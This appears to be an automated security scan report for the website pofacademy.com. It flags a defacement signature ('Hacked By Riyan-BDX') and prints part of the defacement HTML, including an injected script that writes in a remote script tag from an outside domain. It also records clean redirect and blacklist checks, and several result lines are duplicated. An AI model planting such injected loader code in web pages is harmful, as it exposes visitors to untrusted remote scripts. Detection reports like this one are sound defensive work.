Scanned pages/files
Request | Server response | Status |
http://pofacademy.com/ | 200 OK Content-Length: 4229 Content-Type: text/html | suspicious |
Deface/Content modification. The following signature was found: Hacked By Riyan-BDX ...[78 bytes skipped]... cript> <link href='http://fonts.googleapis.com/css?family=Ubuntu+Mono:400,700' rel='stylesheet' type='text/css'> <link href='http://fonts.googleapis.com/css?family=Iceland' rel='stylesheet' type='text/css'> <body bgcolor=black><table width=100% height=100%><td align=center><span style='font: 70px Iceland;size:40px;color:red;text-shadow: 0px 0px 70px;'><strong>Hacked By Riyan-BDX <body bgcolor=black><table width=100% height=50%><td align=center><span style='font: 12px verdana;size:12px;color:white;text-shadow: 0px 0px 12px;'><strong>Surakarta Cyber Army <script type="text/javascript">if(self==top){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);document.write("<scr"+"ipt type=text/javascript src="+idc_glo_url+ "cfs.u-ad ...[3588 bytes skipped]... | ||
http://pofacademy.com/test404page.js | 200 OK Content-Length: 4229 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pofacademy.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 11 Apr 2015 10:18:31 GMT
Server: nginx/1.6.3
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
X-Served-From-Cache: Yes
GET / HTTP/1.1
Host: pofacademy.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 11 Apr 2015 10:18:31 GMT
Server: nginx/1.6.3
Content-Type: text/html; charset=UTF-8
X-Cacheable: YES
X-Served-From-Cache: Yes
Second query (visit from search engine):
GET / HTTP/1.1
Host: pofacademy.com
Referer: http://www.google.com/search?q=pofacademy.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: pofacademy.com
Referer: http://www.google.com/search?q=pofacademy.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pofacademy.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://pofacademy.com/
Result: pofacademy.com is not infected or malware details are not published yet.
Result: pofacademy.com is not infected or malware details are not published yet.